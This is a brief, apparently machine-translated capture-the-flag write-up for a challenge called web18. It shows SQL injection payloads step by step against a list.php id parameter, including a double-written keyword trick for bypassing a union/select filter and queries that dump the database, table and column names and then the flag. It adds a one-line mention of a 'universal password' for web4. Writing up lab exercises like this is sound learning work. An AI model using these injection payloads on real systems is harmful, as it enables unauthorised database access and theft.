web18
Test the single quotation mark first,
http://123.206.31.85:10018/list.php?id=1'
report an error (referring to the content not being displayed),
add a comment,
http://123.206.31.85:10018/list.php?id=1'--+
no error,
explain that this can be injected successfully,
explain that this is a normal injection,
and then try to test the number of fields
http://123.206.31.85:10018/list.php?id=1'union select 1,2,3--+
The
result of the test is that it reports errors from 1 to 10,
and then ran a bit
http://123.206.31.85:10018/list.php?id=1'union--+
without reporting an error. I
found that the keywords were filtered.
Then I tried it and found that the union, select, or were all filtered. The
breakthrough was to double-write keywords to bypass
Burst database
?id=-1'ununionion seleselectct 1,database(),3--+
Burst table
?id=-1'ununionion seleselectct 1,group_concat(table_name),3 from infoorrmation _schema.tables where table_schema='web18'--+
Burst field
?id=-1'ununionion seleselectct 1,group_concat(column_name),3 from infoorrmation _schema.columns where table_name='flag'--+
Burst flag
?id=1 ununionion seleselectct 1,flag,3 from flag--+
End
web4
Then-the
second is beyond words, the universal password directly bursts the flag